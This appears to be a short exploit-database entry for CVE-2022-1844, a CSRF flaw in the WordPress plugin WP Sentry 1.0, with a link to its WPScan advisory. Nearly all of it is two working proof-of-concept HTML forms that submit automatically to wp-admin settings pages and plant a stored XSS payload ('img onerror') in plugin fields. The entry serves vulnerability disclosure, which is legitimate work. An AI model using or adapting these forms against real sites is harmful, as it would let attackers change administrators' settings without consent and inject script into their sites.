CVE: CVE-2022-1844

Name: WP Sentry (wp-sentry)

Version: 1.0

Date: 2022-04-23 18:03:11

Advisory: https://wpscan.com/vulnerability/f0b0baac-7f44-44e1-af73-5a72b967858d

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=sentry-previews" method="POST">
    <input type="text" name="mode" value="update">
    <input type="text" name="preview" value="None">
    <input type="text" name="preview_permalink" value="">
    <input type="text" name="deny_message" value="<img src=x onerror=alert(1)>">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/admin.php?page=wp-sentry%2Fwp-sentry.php" method="POST">
    <input type="text" name="mode" value="update">
    <input type="text" name="post_user_list_enabled" value="Yes">
    <input type="text" name="title_prefix" value="<img src=x onerror=alert(1)>">
    <input type="text" name="title_postfix" value="">
    <input type="text" name="widget_pages_enabled" value="No">
    <input type="text" name="widget_recent_comments_enabled" value="Yes">
</form>
<script>
    document.forms[0].submit();
</script>